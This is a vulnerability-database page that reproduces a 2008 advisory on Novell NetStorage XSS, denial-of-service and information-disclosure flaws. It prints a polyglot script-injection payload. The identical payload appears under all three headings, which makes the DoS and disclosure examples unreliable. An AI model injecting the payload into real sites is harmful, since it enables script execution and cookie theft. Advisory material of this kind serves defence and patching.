header-logo
Suggest Exploit
vendor:
NetStorage
by:
SecurityFocus
7.5
CVSS
HIGH
Information Disclosure, Cross-Site Scripting, Denial-of-Service
200, 79, 400
CWE
Product Name: NetStorage
Affected Version From: NetStorage 3.1.5-19 on Open Enterprise Server (OES)
Affected Version To: NetStorage 2.0.1 on NetWare 6.5 SP6
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Novell NetStorage Remote Vulnerabilities

Attackers can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible.

Mitigation:

Users should upgrade to the latest version of Novell NetStorage to mitigate these vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34267/info

Novell NetStorage is prone to the following remote vulnerabilities:

- An information-disclosure vulnerability
- A cross-site scripting vulnerability
- A denial-of-service vulnerability

Attackers can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible.

The following are vulnerable:

NetStorage 3.1.5-19 on Open Enterprise Server (OES)
NetStorage 2.0.1 on NetWare 6.5 SP6 

The following examples are available:

Cross-site scripting:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Denial of service:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Information disclosure:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>